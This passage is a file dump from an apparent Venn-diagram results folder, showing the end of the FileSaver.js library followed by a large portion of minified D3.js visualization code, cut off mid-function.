	FS_proto.onerror =
	FS_proto.onwriteend =
		null;

	return saveAs;
}(
	   typeof self !== "undefined" && self
	|| typeof window !== "undefined" && window
	|| this.content
));
// `self` is undefined in Firefox for Android content script context
// while `this` is nsIContentFrameMessageManager
// with an attribute `content` that corresponds to the window

if (typeof module !== "undefined" && module.exports) {
  module.exports.saveAs = saveAs;
} else if ((typeof define !== "undefined" && define !== null) && (define.amd != null)) {
  define([], function() {
    return saveAs;
  });
}


==> results/VENN-Diag/VENN_files/d3.min.js <==
!function(){function n(n){return n&&(n.ownerDocument||n.document||n).documentElement}function t(n){return n&&(n.ownerDocument&&n.ownerDocument.defaultView||n.document&&n||n.defaultView)}function e(n,t){return t>n?-1:n>t?1:n>=t?0:0/0}function r(n){return null===n?0/0:+n}function u(n){return!isNaN(n)}function i(n){return{left:function(t,e,r,u){for(arguments.length<3&&(r=0),arguments.length<4&&(u=t.length);u>r;){var i=r+u>>>1;n(t[i],e)<0?r=i+1:u=i}return r},right:function(t,e,r,u){for(arguments.length<3&&(r=0),arguments.length<4&&(u=t.length);u>r;){var i=r+u>>>1;n(t[i],e)>0?u=i:r=i+1}return r}}}function o(n){return n.length}function a(n){for(var t=1;n*t%1;)t*=10;return t}function c(n,t){for(var e in t)Object.defineProperty(n.prototype,e,{value:t[e],enumerable:!1})}function l(){this._=Object.create(null)}function s(n){return(n+="")===pa||n[0]===va?va+n:n}function f(n){return(n+="")[0]===va?n.slice(1):n}function h(n){return s(n)in this._}function g(n){return(n=s(n))in this._&&delete this._[n]}function p(){var n=[];for(var t in this._)n.push(f(t));return n}function v(){var n=0;for(var t in this._)++n;return n}function d(){for(var n in this._)return!1;return!0}function m(){this._=Object.create(null)}function y(n){return n}function M(n,t,e){return function(){var r=e.apply(t,arguments);return r===t?n:r}}function x(n,t){if(t in n)return t;t=t.charAt(0).toUpperCase()+t.slice(1);for(var e=0,r=da.length;r>e;++e){var u=da[e]+t;if(u in n)return u}}function b(){}function _(){}function w(n){function t(){for(var t,r=e,u=-1,i=r.length;++u<i;)(t=r[u].on)&&t.apply(this,arguments);return n}var e=[],r=new l;return t.on=function(t,u){var i,o=r.get(t);return arguments.length<2?o&&o.on:(o&&(o.on=null,e=e.slice(0,i=e.indexOf(o)).concat(e.slice(i+1)),r.remove(t)),u&&e.push(r.set(t,{on:u})),n)},t}function S(){ta.event.preventDefault()}function k(){for(var n,t=ta.event;n=t.sourceEvent;)t=n;return t}function E(n){for(var t=new _,e=0,r=arguments.length;++e<r;)t[arguments[e]]=w(t);return t.of=function(e,r){return function(u){try{var i=u.sourceEvent=ta.event;u.target=n,ta.event=u,t[u.type].apply(e,r)}finally{ta.event=i}}},t}function A(n){return ya(n,_a),n}function N(n){return"function"==typeof n?n:function(){return Ma(n,this)}}function C(n){return"function"==typeof n?n:function(){return xa(n,this)}}function z(n,t){function e(){this.removeAttribute(n)}function r(){this.removeAttributeNS(n.space,n.local)}function u(){this.setAttribute(n,t)}function i(){this.setAttributeNS(n.space,n.local,t)}function o(){var e=t.apply(this,arguments);null==e?this.removeAttribute(n):this.setAttribute(n,e)}function a(){var e=t.apply(this,arguments);null==e?this.removeAttributeNS(n.space,n.local):this.setAttributeNS(n.space,n.local,e)}return n=ta.ns.qualify(n),null==t?n.local?r:e:"function"==typeof t?n.local?a:o:n.local?i:u}function q(n){return n.trim().replace(/\s+/g," ")}function L(n){return new RegExp("(?:^|\\s+)"+ta.requote(n)+"(?:\\s+|$)","g")}function T(n){return(n+"").trim().split(/^|\s+/)}function R(n,t){function e(){for(var e=-1;++e<u;)n[e](this,t)}function r(){for(var e=-1,r=t.apply(this,arguments);++e<u;)n[e](this,r)}n=T(n).map(D);var u=n.length;return"function"==typeof t?r:e}function D(n){var t=L(n);return function(e,r){if(u=e.classList)return r?u.add(n):u.remove(n);var u=e.getAttribute("class")||"";r?(t.lastIndex=0,t.test(u)||e.setAttribute("class",q(u+" "+n))):e.setAttribute("class",q(u.replace(t," ")))}}function P(n,t,e){function r(){this.style.removeProperty(n)}function u(){this.style.setProperty(n,t,e)}function i(){var r=t.apply(this,arguments);null==r?this.style.removeProperty(n):this.style.setProperty(n,r,e)}return null==t?r:"function"==typeof t?i:u}function U(n,t){function e(){delete this[n]}function r(){this[n]=t}function u(){var e=t.apply(this,arguments);null==e?delete this[n]:this[n]=e}return null==t?e:"function"==typeof t?u:r}function j(n){function t(){var t=this.ownerDocument,e=this.namespaceURI;return e?t.createElementNS(e,n):t.createElement(n)}function e(){return this.ownerDocument.createElementNS(n.space,n.local)}return"function"==typeof n?n:(n=ta.ns.qualify(n)).local?e:t}function F(){var n=this.parentNode;n&&n.removeChild(this)}function H(n){return{__data__:n}}function O(n){return function(){return ba(this,n)}}function I(n){return arguments.length||(n=e),function(t,e){return t&&e?n(t.__data__,e.__data__):!t-!e}}function Y(n,t){for(var e=0,r=n.length;r>e;e++)for(var u,i=n[e],o=0,a=i.length;a>o;o++)(u=i[o])&&t(u,o,e);return n}function Z(n){return ya(n,Sa),n}function V(n){var t,e;return function(r,u,i){var o,a=n[i].update,c=a.length;for(i!=e&&(e=i,t=0),u>=t&&(t=u+1);!(o=a[t])&&++t<c;);return o}}function X(n,t,e){function r(){var t=this[o];t&&(this.removeEventListener(n,t,t.$),delete this[o])}function u(){var u=c(t,ra(arguments));r.call(this),this.addEventListener(n,this[o]=u,u.$=e),u._=t}function i(){var t,e=new RegExp("^__on([^.]+)"+ta.requote(n)+"$");for(var r in this)if(t=r.match(e)){var u=this[r];this.removeEventListener(t[1],u,u.$),delete this[r]}}var o="__on"+n,a=n.indexOf("."),c=$;a>0&&(n=n.slice(0,a));var l=ka.get(n);return l&&(n=l,c=B),a?t?u:r:t?b:i}function $(n,t){return function(e){var r=ta.event;ta.event=e,t[0]=this.__data__;try{n.apply(this,t)}finally{ta.event=r}}}function B(n,t){var e=$(n,t);return function(n){var t=this,r=n.relatedTarget;r&&(r===t||8&r.compareDocumentPosition(t))||e.call(t,n)}}function W(e){var r=".dragsuppress-"+ ++Aa,u="click"+r,i=ta.select(t(e)).on("touchmove"+r,S).on("dragstart"+r,S).on("selectstart"+r,S);if(null==Ea&&(Ea="onselectstart"in e?!1:x(e.style,"userSelect")),Ea){var o=n(e).style,a=o[Ea];o[Ea]="none"}return function(n){if(i.on(r,null),Ea&&(o[Ea]=a),n){var t=function(){i.on(u,null)};i.on(u,function(){S(),t()},!0),setTimeout(t,0)}}}function J(n,e){e.changedTouches&&(e=e.changedTouches[0]);var r=n.ownerSVGElement||n;if(r.createSVGPoint){var u=r.createSVGPoint();if(0>Na){var i=t(n);if(i.scrollX||i.scrollY){r=ta.select("body").append("svg").style({position:"absolute",top:0,left:0,margin:0,padding:0,border:"none"},"important");var o=r[0][0].getScreenCTM();Na=!(o.f||o.e),r.remove()}}return Na?(u.x=e.pageX,u.y=e.pageY):(u.x=e.clientX,u.y=e.clientY),u=u.matrixTransform(n.getScreenCTM().inverse()),[u.x,u.y]}var a=n.getBoundingClientRect();return[e.clientX-a.left-n.clientLeft,e.clientY-a.top-n.clientTop]}function G(){return ta.event.changedTouches[0].identifier}function K(n){return n>0?1:0>n?-1:0}function Q(n,t,e){return(t[0]-n[0])*(e[1]-n[1])-(t[1]-n[1])*(e[0]-n[0])}function nt(n){return n>1?0:-1>n?qa:Math.acos(n)}function tt(n){return n>1?Ra:-1>n?-Ra:Math.asin(n)}function et(n){return((n=Math.exp(n))-1/n)/2}function rt(n){return((n=Math.exp(n))+1/n)/2}function ut(n){return((n=Math.exp(2*n))-1)/(n+1)}function it(n){return(n=Math.sin(n/2))*n}function ot(){}function at(n,t,e){return this instanceof at?(this.h=+n,this.s=+t,void(this.l=+e)):arguments.length<2?n instanceof at?new at(n.h,n.s,n.l):bt(""+n,_t,at):new at(n,t,e)}function ct(n,t,e){function r(n){return n>360?n-=360:0>n&&(n+=360),60>n?i+(o-i)*n/60:180>n?o:240>n?i+(o-i)*(240-n)/60:i}function u(n){return Math.round(255*r(n))}var i,o;return n=isNaN(n)?0:(n%=360)<0?n+360:n,t=isNaN(t)?0:0>t?0:t>1?1:t,e=0>e?0:e>1?1:e,o=.5>=e?e*(1+t):e+t-e*t,i=2*e-o,new mt(u(n+120),u(n),u(n-120))}function lt(n,t,e){return this instanceof lt?(this.h=+n,this.c=+t,void(this.l=+e)):arguments.length<2?n instanceof lt?new lt(n.h,n.c,n.l):n instanceof ft?gt(n.l,n.a,n.b):gt((n=wt((n=ta.rgb(n)).r,n.g,n.b)).l,n.a,n.b):new lt(n,t,e)}function st(n,t,e){return isNaN(n)&&(n=0),isNaN(t)&&(t=0),new ft(e,Math.cos(n*=Da)*t,Math.sin(n)*t)}function ft(n,t,e){return this instanceof ft?(this.l=+n,this.a=+t,void(this.b=+e)):arguments.length<2?n instanceof ft?new ft(n.l,n.a,n.b):n instanceof lt?st(n.h,n.c,n.l):wt((n=mt(n)).r,n.g,n.b):new ft(n,t,e)}function ht(n,t,e){var r=(n+16)/116,u=r+t/500,i=r-e/200;return u=pt(u)*Xa,r=pt(r)*$a,i=pt(i)*Ba,new mt(dt(3.2404542*u-1.5371385*r-.4985314*i),dt(-.969266*u+1.8760108*r+.041556*i),dt(.0556434*u-.2040259*r+1.0572252*i))}function gt(n,t,e){return n>0?new lt(Math.atan2(e,t)*Pa,Math.sqrt(t*t+e*e),n):new lt(0/0,0/0,n)}function pt(n){return n>.206893034?n*n*n:(n-4/29)/7.787037}function vt(n){return n>.008856?Math.pow(n,1/3):7.787037*n+4/29}function dt(n){return Math.round(255*(.00304>=n?12.92*n:1.055*Math.pow(n,1/2.4)-.055))}function mt(n,t,e){return this instanceof mt?(this.r=~~n,this.g=~~t,void(this.b=~~e)):arguments.length<2?n instanceof mt?new mt(n.r,n.g,n.b):bt(""+n,mt,ct):new mt(n,t,e)}function yt(n){return new mt(n>>16,n>>8&255,255&n)}function Mt(n){return yt(n)+""}function xt(n){return 16>n?"0"+Math.max(0,n).toString(16):Math.min(255,n).toString(16)}function bt(n,t,e){var r,u,i,o=0,a=0,c=0;if(r=/([a-z]+)\((.*)\)/i.exec(n))switch(u=r[2].split(","),r[1]){case"hsl":return e(parseFloat(u[0]),parseFloat(u[1])/100,parseFloat(u[2])/100);case"rgb":return t(kt(u[0]),kt(u[1]),kt(u[2]))}return(i=Ga.get(n.toLowerCase()))?t(i.r,i.g,i.b):(null==n||"#"!==n.charAt(0)||isNaN(i=parseInt(n.slice(1),16))||(4===n.length?(o=(3840&i)>>4,o=o>>4|o,a=240&i,a=a>>4|a,c=15&i,c=c<<4|c):7===n.length&&(o=(16711680&i)>>16,a=(65280&i)>>8,c=255&i)),t(o,a,c))}function _t(n,t,e){var r,u,i=Math.min(n/=255,t/=255,e/=255),o=Math.max(n,t,e),a=o-i,c=(o+i)/2;return a?(u=.5>c?a/(o+i):a/(2-o-i),r=n==o?(t-e)/a+(e>t?6:0):t==o?(e-n)/a+2:(n-t)/a+4,r*=60):(r=0/0,u=c>0&&1>c?0:r),new at(r,u,c)}function wt(n,t,e){n=St(n),t=St(t),e=St(e);var r=vt((.4124564*n+.3575761*t+.1804375*e)/Xa),u=vt((.2126729*n+.7151522*t+.072175*e)/$a),i=vt((.0193339*n+.119192*t+.9503041*e)/Ba);return ft(116*u-16,500*(r-u),200*(u-i))}function St(n){return(n/=255)<=.04045?n/12.92:Math.pow((n+.055)/1.055,2.4)}function kt(n){var t=parseFloat(n);return"%"===n.charAt(n.length-1)?Math.round(2.55*t):t}function Et(n){return"function"==typeof n?n:function(){return n}}function At(n){return function(t,e,r){return 2===arguments.length&&"function"==typeof e&&(r=e,e=null),Nt(t,e,n,r)}}function Nt(n,t,e,r){function u(){var n,t=c.status;if(!t&&zt(c)||t>=200&&300>t||304===t){try{n=e.call(i,c)}catch(r){return void o.error.call(i,r)}o.load.call(i,n)}else o.error.call(i,c)}var i={},o=ta.dispatch("beforesend","progress","load","error"),a={},c=new XMLHttpRequest,l=null;return!this.XDomainRequest||"withCredentials"in c||!/^(http(s)?:)?\/\//.test(n)||(c=new XDomainRequest),"onload"in c?c.onload=c.onerror=u:c.onreadystatechange=function(){c.readyState>3&&u()},c.onprogress=function(n){var t=ta.event;ta.event=n;try{o.progress.call(i,c)}finally{ta.event=t}},i.header=function(n,t){return n=(n+"").toLowerCase(),arguments.length<2?a[n]:(null==t?delete a[n]:a[n]=t+"",i)},i.mimeType=function(n){return arguments.length?(t=null==n?null:n+"",i):t},i.responseType=function(n){return arguments.length?(l=n,i):l},i.response=function(n){return e=n,i},["get","post"].forEach(function(n){i[n]=function(){return i.send.apply(i,[n].concat(ra(arguments)))}}),i.send=function(e,r,u){if(2===arguments.length&&"function"==typeof r&&(u=r,r=null),c.open(e,n,!0),null==t||"accept"in a||(a.accept=t+",*/*"),c.setRequestHeader)for(var s in a)c.setRequestHeader(s,a[s]);return null!=t&&c.overrideMimeType&&c.overrideMimeType(t),null!=l&&(c.responseType=l),null!=u&&i.on("error",u).on("load",function(n){u(null,n)}),o.beforesend.call(i,c),c.send(null==r?null:r),i},i.abort=function(){return c.abort(),i},ta.rebind(i,o,"on"),null==r?i:i.get(Ct(r))}function Ct(n){return 1===n.length?function(t,e){n(null==t?e:null)}:n}function zt(n){var t=n.responseType;return t&&"text"!==t?n.response:n.responseText}function qt(){var n=Lt(),t=Tt()-n;t>24?(isFinite(t)&&(clearTimeout(tc),tc=setTimeout(qt,t)),nc=0):(nc=1,rc(qt))}function Lt(){var n=Date.now();for(ec=Ka;ec;)n>=ec.t&&(ec.f=ec.c(n-ec.t)),ec=ec.n;return n}function Tt(){for(var n,t=Ka,e=1/0;t;)t.f?t=n?n.n=t.n:Ka=t.n:(t.t<e&&(e=t.t),t=(n=t).n);return Qa=n,e}function Rt(n,t){return t-(n?Math.ceil(Math.log(n)/Math.LN10):1)}function Dt(n,t){var e=Math.pow(10,3*ga(8-t));return{scale:t>8?function(n){return n/e}:function(n){return n*e},symbol:n}}function Pt(n){var t=n.decimal,e=n.thousands,r=n.grouping,u=n.currency,i=r&&e?function(n,t){for(var u=n.length,i=[],o=0,a=r[0],c=0;u>0&&a>0&&(c+a+1>t&&(a=Math.max(1,t-c)),i.push(n.substring(u-=a,u+a)),!((c+=a+1)>t));)a=r[o=(o+1)%r.length];return i.reverse().join(e)}:y;return function(n){var e=ic.exec(n),r=e[1]||" ",o=e[2]||">",a=e[3]||"-",c=e[4]||"",l=e[5],s=+e[6],f=e[7],h=e[8],g=e[9],p=1,v="",d="",m=!1,y=!0;switch(h&&(h=+h.substring(1)),(l||"0"===r&&"="===o)&&(l=r="0",o="="),g){case"n":f=!0,g="g";break;case"%":p=100,d="%",g="f";break;case"p":p=100,d="%",g="r";break;case"b":case"o":case"x":case"X":"#"===c&&(v="0"+g.toLowerCase());case"c":y=!1;case"d":m=!0,h=0;break;case"s":p=-1,g="r"}"$"===c&&(v=u[0],d=u[1]),"r"!=g||h||(g="g"),null!=h&&("g"==g?h=Math.max(1,Math.min(21,h)):("e"==g||"f"==g)&&(h=Math.max(0,Math.min(20,h)))),g=oc.get(g)||Ut;var M=l&&f;return function(n){var e=d;if(m&&n%1)return"";var u=0>n||0===n&&0>1/n?(n=-n,"-"):"-"===a?"":a;if(0>p){var c=ta.formatPrefix(n,h);n=c.scale(n),e=c.symbol+d}else n*=p;n=g(n,h);var x,b,_=n.lastIndexOf(".");if(0>_){var w=y?n.lastIndexOf("e"):-1;0>w?(x=n,b=""):(x=n.substring(0,w),b=n.substring(w))}else x=n.substring(0,_),b=t+n.substring(_+1);!l&&f&&(x=i(x,1/0));var S=v.length+x.length+b.length+(M?0:u.length),k=s>S?new Array(S=s-S+1).join(r):"";return M&&(x=i(k+x,k.length?s-b.length:1/0)),u+=v,n=x+b,("<"===o?u+n+k:">"===o?k+u+n:"^"===o?k.substring(0,S>>=1)+u+n+k.substring(S):u+(M?n:k+n))+e}}}function Ut(n){return n+""}function jt(){this._=new Date(arguments.length>1?Date.UTC.apply(this,arguments):arguments[0])}function Ft(n,t,e){function r(t){var e=n(t),r=i(e,1);return r-t>t-e?e:r}function u(e){return t(e=n(new cc(e-1)),1),e}function i(n,e){return t(n=new cc(+n),e),n}function o(n,r,i){var o=u(n),a=[];if(i>1)for(;r>o;)e(o)%i||a.push(new Date(+o)),t(o,1);else for(;r>o;)a.push(new Date(+o)),t(o,1);return a}function a(n,t,e){try{cc=jt;var r=new jt;return r._=n,o(r,t,e)}finally{cc=Date}}n.floor=n,n.round=r,n.ceil=u,n.offset=i,n.range=o;var c=n.utc=Ht(n);return c.floor=c,c.round=Ht(r),c.ceil=Ht(u),c.offset=Ht(i),c.range=a,n}function Ht(n){return function(t,e){try{cc=jt;var r=new jt;return r._=t,n(r,e)._}finally{cc=Date}}}function Ot(n){function t(n){function t(t){for(var e,u,i,o=[],a=-1,c=0;++a<r;)37===n.charCodeAt(a)&&(o.push(n.slice(c,a)),null!=(u=sc[e=n.charAt(++a)])&&(e=n.charAt(++a)),(i=N[e])&&(e=i(t,null==u?"e"===e?" ":"0":u)),o.push(e),c=a+1);return o.push(n.slice(c,a)),o.join("")}var r=n.length;return t.parse=function(t){var r={y:1900,m:0,d:1,H:0,M:0,S:0,L:0,Z:null},u=e(r,n,t,0);if(u!=t.length)return null;"p"in r&&(r.H=r.H%12+12*r.p);var i=null!=r.Z&&cc!==jt,o=new(i?jt:cc);return"j"in r?o.setFullYear(r.y,0,r.j):"w"in r&&("W"in r||"U"in r)?(o.setFullYear(r.y,0,1),o.setFullYear(r.y,0,"W"in r?(r.w+6)%7+7*r.W-(o.getDay()+5)%7:r.w+7*r.U-(o.getDay()+6)%7)):o.setFullYear(r.y,r.m,r.d),o.setHours(r.H+(r.Z/100|0),r.M+r.Z%100,r.S,r.L),i?o._:o},t.toString=function(){return n},t}function e(n,t,e,r){for(var u,i,o,a=0,c=t.length,l=e.length;c>a;){if(r>=l)return-1;if(u=t.charCodeAt(a++),37===u){if(o=t.charAt(a++),i=C[o in sc?t.charAt(a++):o],!i||(r=i(n,e,r))<0)return-1}else if(u!=e.charCodeAt(r++))return-1}return r}function r(n,t,e){_.lastIndex=0;var r=_.exec(t.slice(e));return r?(n.w=w.get(r[0].toLowerCase()),e+r[0].length):-1}function u(n,t,e){x.lastIndex=0;var r=x.exec(t.slice(e));return r?(n.w=b.get(r[0].toLowerCase()),e+r[0].length):-1}function i(n,t,e){E.lastIndex=0;var r=E.exec(t.slice(e));return r?(n.m=A.get(r[0].toLowerCase()),e+r[0].length):-1}function o(n,t,e){S.lastIndex=0;var r=S.exec(t.slice(e));return r?(n.m=k.get(r[0].toLowerCase()),e+r[0].length):-1}function a(n,t,r){return e(n,N.c.toString(),t,r)}function c(n,t,r){return e(n,N.x.toString(),t,r)}function l(n,t,r){return e(n,N.X.toString(),t,r)}function s(n,t,e){var r=M.get(t.slice(e,e+=2).toLowerCase());return null==r?-1:(n.p=r,e)}var f=n.dateTime,h=n.date,g=n.time,p=n.periods,v=n.days,d=n.shortDays,m=n.months,y=n.shortMonths;t.utc=function(n){function e(n){try{cc=jt;var t=new cc;return t._=n,r(t)}finally{cc=Date}}var r=t(n);return e.parse=function(n){try{cc=jt;var t=r.parse(n);return t&&t._}finally{cc=Date}},e.toString=r.toString,e},t.multi=t.utc.multi=ae;var M=ta.map(),x=Yt(v),b=Zt(v),_=Yt(d),w=Zt(d),S=Yt(m),k=Zt(m),E=Yt(y),A=Zt(y);p.forEach(function(n,t){M.set(n.toLowerCase(),t)});var N={a:function(n){return d[n.getDay()]},A:function(n){return v[n.getDay()]},b:function(n){return y[n.getMonth()]},B:function(n){return m[n.getMonth()]},c:t(f),d:function(n,t){return It(n.getDate(),t,2)},e:function(n,t){return It(n.getDate(),t,2)},H:function(n,t){return It(n.getHours(),t,2)},I:function(n,t){return It(n.getHours()%12||12,t,2)},j:function(n,t){return It(1+ac.dayOfYear(n),t,3)},L:function(n,t){return It(n.getMilliseconds(),t,3)},m:function(n,t){return It(n.getMonth()+1,t,2)},M:function(n,t){return It(n.getMinutes(),t,2)},p:function(n){return p[+(n.getHours()>=12)]},S:function(n,t){return It(n.getSeconds(),t,2)},U:function(n,t){return It(ac.sundayOfYear(n),t,2)},w:function(n){return n.getDay()},W:function(n,t){return It(ac.mondayOfYear(n),t,2)},x:t(h),X:t(g),y:function(n,t){return It(n.getFullYear()%100,t,2)},Y:function(n,t){return It(n.getFullYear()%1e4,t,4)},Z:ie,"%":function(){return"%"}},C={a:r,A:u,b:i,B:o,c:a,d:Qt,e:Qt,H:te,I:te,j:ne,L:ue,m:Kt,M:ee,p:s,S:re,U:Xt,w:Vt,W:$t,x:c,X:l,y:Wt,Y:Bt,Z:Jt,"%":oe};return t}function It(n,t,e){var r=0>n?"-":"",u=(r?-n:n)+"",i=u.length;return r+(e>i?new Array(e-i+1).join(t)+u:u)}function Yt(n){return new RegExp("^(?:"+n.map(ta.requote).join("|")+")","i")}function Zt(n){for(var t=new l,e=-1,r=n.length;++e<r;)t.set(n[e].toLowerCase(),e);return t}function Vt(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+1));return r?(n.w=+r[0],e+r[0].length):-1}function Xt(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e));return r?(n.U=+r[0],e+r[0].length):-1}function $t(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e));return r?(n.W=+r[0],e+r[0].length):-1}function Bt(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+4));return r?(n.y=+r[0],e+r[0].length):-1}function Wt(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+2));return r?(n.y=Gt(+r[0]),e+r[0].length):-1}function Jt(n,t,e){return/^[+-]\d{4}$/.test(t=t.slice(e,e+5))?(n.Z=-t,e+5):-1}function Gt(n){return n+(n>68?1900:2e3)}function Kt(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+2));return r?(n.m=r[0]-1,e+r[0].length):-1}function Qt(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+2));return r?(n.d=+r[0],e+r[0].length):-1}function ne(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+3));return r?(n.j=+r[0],e+r[0].length):-1}function te(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+2));return r?(n.H=+r[0],e+r[0].length):-1}function ee(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+2));return r?(n.M=+r[0],e+r[0].length):-1}function re(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+2));return r?(n.S=+r[0],e+r[0].length):-1}function ue(n,t,e){fc.lastIndex=0;var r=fc.exec(t.slice(e,e+3));return r?(n.L=+r[0],e+r[0].length):-1}function ie(n){var t=n.getTimezoneOffset(),e=t>0?"-":"+",r=ga(t)/60|0,u=ga(t)%60;return e+It(r,"0",2)+It(u,"0",2)}function oe(n,t,e){hc.lastIndex=0;var r=hc.exec(t.slice(e,e+1));return r?e+r[0].length:-1}function ae(n){for(var t=n.length,e=-1;++e<t;)n[e][0]=this(n[e][0]);return function(t){for(var e=0,r=n[e];!r[1](t);)r=n[++e];return r[0](t)}}function ce(){}function le(n,t,e){var r=e.s=n+t,u=r-n,i=r-u;e.t=n-i+(t-u)}function se(n,t){n&&dc.hasOwnProperty(n.type)&&dc[n.type](n,t)}function fe(n,t,e){var r,u=-1,i=n.length-e;for(t.lineStart();++u<i;)r=n[u],t.point(r[0],r[1],r[2]);t.lineEnd()}function he(n,t){var e=-1,r=n.length;for(t.polygonStart();++e<r;)fe(n[e],t,1);t.polygonEnd()}function ge(){function n(n,t){n*=Da,t=t*Da/2+qa/4;var e=n-r,o=e>=0?1:-1,a=o*e,c=Math.cos(t),l=Math.sin(t),s=i*l,f=u*c+s*Math.cos(a),h=s*o*Math.sin(a);yc.add(Math.atan2(h,f)),r=n,u=c,i=l}var t,e,r,u,i;Mc.point=function(o,a){Mc.point=n,r=(t=o)*Da,u=Math.cos(a=(e=a)*Da/2+qa/4),i=Math.sin(a)},Mc.lineEnd=function(){n(t,e)}}function pe(n){var t=n[0],e=n[1],r=Math.cos(e);return[r*Math.cos(t),r*Math.sin(t),Math.sin(e)]}function ve(n,t){return n[0]*t[0]+n[1]*t[1]+n[2]*t[2]}function de(n,t){return[n[1]*t[2]-n[2]*t[1],n[2]*t[0]-n[0]*t[2],n[0]*t[1]-n[1]*t[0]]}function me(n,t){n[0]+=t[0],n[1]+=t[1],n[2]+=t[2]}function ye(n,t){return[n[0]*t,n[1]*t,n[2]*t]}function Me(n){var t=Math.sqrt(n[0]*n[0]+n[1]*n[1]+n[2]*n[2]);n[0]/=t,n[1]/=t,n[2]/=t}function xe(n){return[Math.atan2(n[1],n[0]),tt(n[2])]}function be(n,t){return ga(n[0]-t[0])<Ca&&ga(n[1]-t[1])<Ca}function _e(n,t){n*=Da;var e=Math.cos(t*=Da);we(e*Math.cos(n),e*Math.sin(n),Math.sin(t))}function we(n,t,e){++xc,_c+=(n-_c)/xc,wc+=(t-wc)/xc,Sc+=(e-Sc)/xc}function Se(){function n(n,u){n*=Da;var i=Math.cos(u*=Da),o=i*Math.cos(n),a=i*Math.sin(n),c=Math.sin(u),l=Math.atan2(Math.sqrt((l=e*c-r*a)*l+(l=r*o-t*c)*l+(l=t*a-e*o)*l),t*o+e*a+r*c);bc+=l,kc+=l*(t+(t=o)),Ec+=l*(e+(e=a)),Ac+=l*(r+(r=c)),we(t,e,r)}var t,e,r;qc.point=function(u,i){u*=Da;var o=Math.cos(i*=Da);t=o*Math.cos(u),e=o*Math.sin(u),r=Math.sin(i),qc.point=n,we(t,e,r)}}function ke(){qc.point=_e}function Ee(){function n(n,t){n*=Da;var e=Math.cos(t*=Da),o=e*Math.cos(n),a=e*Math.sin(n),c=Math.sin(t),l=u*c-i*a,s=i*o-r*c,f=r*a-u*o,h=Math.sqrt(l*l+s*s+f*f),g=r*o+u*a+i*c,p=h&&-nt(g)/h,v=Math.atan2(h,g);Nc+=p*l,Cc+=p*s,zc+=p*f,bc+=v,kc+=v*(r+(r=o)),Ec+=v*(u+(u=a)),Ac+=v*(i+(i=c)),we(r,u,i)}var t,e,r,u,i;qc.point=function(o,a){t=o,e=a,qc.point=n,o*=Da;var c=Math.cos(a*=Da);r=c*Math.cos(o),u=c*Math.sin(o),i=Math.sin(a),we(r,u,i)},qc.lineEnd=function(){n(t,e),qc.lineEnd=ke,qc.point=_e}}function Ae(n,t){function e(e,r){return e=n(e,r),t(e[0],e[1])}return n.invert&&t.invert&&(e.invert=function(e,r){return e=t.invert(e,r),e&&n.invert(e[0],e[1])}),e}function Ne(){return!0}function Ce(n,t,e,r,u){var i=[],o=[];if(n.forEach(function(n){if(!((t=n.length-1)<=0)){var t,e=n[0],r=n[t];if(be(e,r)){u.lineStart();for(var a=0;t>a;++a)u.point((e=n[a])[0],e[1]);return void u.lineEnd()}var c=new qe(e,n,null,!0),l=new qe(e,null,c,!1);c.o=l,i.push(c),o.push(l),c=new qe(r,n,null,!1),l=new qe(r,null,c,!0),c.o=l,i.push(c),o.push(l)}}),o.sort(t),ze(i),ze(o),i.length){for(var a=0,c=e,l=o.length;l>a;++a)o[a].e=c=!c;for(var s,f,h=i[0];;){for(var g=h,p=!0;g.v;)if((g=g.n)===h)return;s=g.z,u.lineStart();do{if(g.v=g.o.v=!0,g.e){if(p)for(var a=0,l=s.length;l>a;++a)u.point((f=s[a])[0],f[1]);else r(g.x,g.n.x,1,u);g=g.n}else{if(p){s=g.p.z;for(var a=s.length-1;a>=0;--a)u.point((f=s[a])[0],f[1])}else r(g.x,g.p.x,-1,u);g=g.p}g=g.o,s=g.z,p=!p}while(!g.v);u.lineEnd()}}}function ze(n){if(t=n.length){for(var t,e,r=0,u=n[0];++r<t;)u.n=e=n[r],e.p=u,u=e;u.n=e=n[0],e.p=u}}function qe(n,t,e,r){this.x=n,this.z=t,this.o=e,this.e=r,this.v=!1,this.n=this.p=null}function Le(n,t,e,r){return function(u,i){function o(t,e){var r=u(t,e);n(t=r[0],e=r[1])&&i.point(t,e)}function a(n,t){var e=u(n,t);d.point(e[0],e[1])}function c(){y.point=a,d.lineStart()}function l(){y.point=o,d.lineEnd()}function s(n,t){v.push([n,t]);var e=u(n,t);x.point(e[0],e[1])}function f(){x.lineStart(),v=[]}function h(){s(v[0][0],v[0][1]),x.lineEnd();var n,t=x.clean(),e=M.buffer(),r=e.length;if(v.pop(),p.push(v),v=null,r)if(1&t){n=e[0];var u,r=n.length-1,o=-1;if(r>0){for(b||(i.polygonStart(),b=!0),i.lineStart();++o<r;)i.point((u=n[o])[0],u[1]);i.lineEnd()}}else r>1&&2&t&&e.push(e.pop().concat(e.shift())),g.push(e.filter(Te))}var g,p,v,d=t(i),m=u.invert(r[0],r[1]),y={point:o,lineStart:c,lineEnd:l,polygonStart:function(){y.point=s,y.lineStart=f,y.lineEnd=h,g=[],p=[]},polygonEnd:function(){y.point=o,y.lineStart=c,y.lineEnd=l,g=ta.merge(g);var n=Fe(m,p);g.length?(b||(i.polygonStart(),b=!0),Ce(g,De,n,e,i)):n&&(b||(i.polygonStart(),b=!0),i.lineStart(),e(null,null,1,i),i.lineEnd()),b&&(i.polygonEnd(),b=!1),g=p=null},sphere:function(){i.polygonStart(),i.lineStart(),e(null,null,1,i),i.lineEnd(),i.polygonEnd()}},M=Re(),x=t(M),b=!1;return y}}function Te(n){return n.length>1}function Re(){var n,t=[];return{lineStart:function(){t.push(n=[])},point:function(t,e){n.push([t,e])},lineEnd:b,buffer:function(){var e=t;return t=[],n=null,e},rejoin:function(){t.length>1&&t.push(t.pop().concat(t.shift()))}}}function 